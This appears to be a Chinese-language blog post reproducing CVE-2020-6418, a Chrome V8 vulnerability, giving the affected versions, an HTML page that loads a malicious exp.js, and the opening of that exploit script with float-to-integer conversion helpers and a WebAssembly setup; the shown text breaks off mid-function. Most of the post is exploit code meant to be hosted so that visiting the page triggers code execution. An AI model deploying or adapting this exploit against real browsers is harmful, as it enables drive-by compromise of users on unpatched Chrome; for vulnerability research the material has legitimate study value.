CVE-2020-6418是2020年2月24日Google公布的一个Chrome浏览器的高危漏洞。复现一下,感受一下
影响版本
Chrome < 80.0.3987.122
漏洞复现
测试的Chrome版本为80.0.3987.87
部署恶意html页面在web服务器,访问恶意html页面触发弹出Chrome内置打印机
- html
<html lang="en">
<head>
<meta charset="UTF-8">
<title>test</title>
<script type="text/javascript" src="exp.js"></script>
</head>
</html>
exp.js:
const MAX_ITERATIONS = 0x10000;
var maxSize = 1020*4;
var buf =new ArrayBuffer(16);
var float64 = new Float64Array(buf);
var bigUint64 = new BigUint64Array(buf);
var uint32 = new Uint32Array(buf);
// Floating point to 64-bit unsigned integer
function f2i(f)
{
float64[0] = f;
return bigUint64[0];
}
// 64-bit unsigned integer to Floating point
function i2f(i)
{
bigUint64[0] = i;
return float64[0];
}
function f2half(val)
{
float64[0]= val;
let tmp = Array.from(uint32);
return tmp;
}
function half2f(val)
{
uint32.set(val);
return float64[0];
}
// 64-bit unsigned integer to hex
function hex(i)
{
return "0x"+i.toString(16).padStart(16, "0");
}
function wasm_func() {
var wasmImports = {
env: {
puts: function puts (index) {
print(utf8ToString(h, index));
}
}
};